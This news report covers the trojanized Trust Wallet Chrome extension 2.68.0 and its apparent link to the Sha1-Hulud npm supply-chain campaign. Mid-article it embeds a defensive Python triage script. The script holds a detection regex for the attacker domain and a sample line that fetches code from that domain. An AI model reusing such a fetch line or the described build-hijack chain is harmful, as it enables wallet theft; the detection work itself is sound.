Trust Wallet links $8.5M browser extension hack to industry-wide Sha1-Hulud attack

Trust Wallet believes the recent compromise of its web browser extension, which led to the theft of roughly $8.5 million from more than 2,500 crypto wallets, is likely connected to the wider “Sha1-Hulud” supply chain attacks that hit the software industry in November.

Trust Wallet, used by over 200 million people worldwide, allows users to store, send, and receive Bitcoin, Ethereum, Solana, and thousands of other cryptocurrencies through a browser extension and mobile apps. The December 24 incident stemmed from a trojanized version of the Trust Wallet Chrome extension.

According to the company, attackers gained access after Trust Wallet’s developer GitHub secrets were exposed. This allowed the threat actor to obtain the browser extension source code and a Chrome Web Store (CWS) API key. With full CWS API access, the attacker bypassed Trust Wallet’s internal approval and manual review process and directly uploaded a malicious build.

The compromised version, released as Trust Wallet extension version 2.68.0, included a malicious JavaScript file that silently collected sensitive wallet data and enabled unauthorized transactions. To support the attack, the threat actor registered the domain metrics-trustwallet[.]com and a related subdomain to host the malicious code referenced by the altered extension.

Trust Wallet said the attacker used legitimate source code obtained via leaked secrets, embedding the malicious functionality without relying on obvious code injection techniques. Because the upload was signed and passed Chrome Web Store checks, it was automatically released to users.
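A defender-side triage check for the chain described above, added here as an example and not code from Trust Wallet or the report: it walks a Chrome extension profile directory, flags the compromised release 2.68.0 by manifest name and version, and searches every bundled script for a reference to the attacker-registered domain (the version and domain come from the report; the Trust Wallet name match, the directory layout and the sample data are assumptions).

```python
"""Triage installed Chrome extensions for the trojanized Trust Wallet build."""
import json
import re
from pathlib import Path

COMPROMISED_VERSION = "2.68.0"  # version named in the report
# Report's domain (written de-fanged there); the regex also catches its subdomains.
ATTACKER_DOMAIN = re.compile(r"metrics-trustwallet\.com", re.I)
# Assumption: the manifest "name" contains the product name. Chrome may store a
# localized placeholder such as __MSG_appName__ instead; resolve _locales/ if so.
NAME_HINT = re.compile(r"trust\s*wallet", re.I)


def scan_extension(manifest, scripts):
    """Findings for one extension: manifest dict plus {filename: JS source}."""
    findings = []
    name = str(manifest.get("name", ""))
    version = str(manifest.get("version", ""))
    if NAME_HINT.search(name) and version == COMPROMISED_VERSION:
        findings.append(f"compromised build: {name} {version}")
    for fname, src in scripts.items():
        if ATTACKER_DOMAIN.search(src):
            findings.append(f"attacker domain referenced in {fname}")
    return findings


def scan_profile(ext_root):
    """Scan <profile>/Extensions/<id>/<version>/ trees; return {ext_dir: findings}."""
    results = {}
    for manifest_path in Path(ext_root).rglob("manifest.json"):
        ext_dir = manifest_path.parent
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or non-JSON manifest: skip it
        scripts = {}
        for js in ext_dir.rglob("*.js"):
            try:
                scripts[str(js.relative_to(ext_dir))] = js.read_text(
                    encoding="utf-8", errors="ignore")
            except OSError:
                continue
        findings = scan_extension(manifest, scripts)
        if findings:
            results[str(ext_dir)] = findings
    return results


# Constructed sample mirroring the incident (not real extension code): the tainted
# version plus a background script that pulls code from the attacker domain.
SAMPLE_MANIFEST = {"name": "Trust Wallet", "version": "2.68.0", "manifest_version": 3}
SAMPLE_SCRIPTS = {"background.js": 'fetch("https://metrics-trustwallet.com/c")',
                  "popup.js": "console.log('benign');"}
```

Run `scan_profile("<chrome profile>/Extensions")` on a live profile; a hit on the domain regex in any extension, not only Trust Wallet, is worth a closer look since the report says the hosted code was what the altered extension loaded.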

In response, Trust Wallet revoked all release-related APIs to prevent further malicious uploads and worked with the NiceNIC registrar to suspend the attacker-controlled domains, stopping additional data exfiltration.

The company believes this incident is linked to Sha1-Hulud (also known as Shai-Hulud 2.0), a large-scale supply chain attack targeting the npm software registry. The campaign initially emerged in September, when attackers compromised over 180 npm packages using a self-propagating payload to steal developer secrets and API keys.

The Sha1-Hulud campaign later expanded, impacting more than 800 packages and introducing over 27,000 malicious npm packages designed to harvest developer and CI/CD secrets. In total, the campaign exposed approximately 400,000 raw secrets across more than 30,000 GitHub repositories, with a majority of stolen npm tokens still valid as of early December.
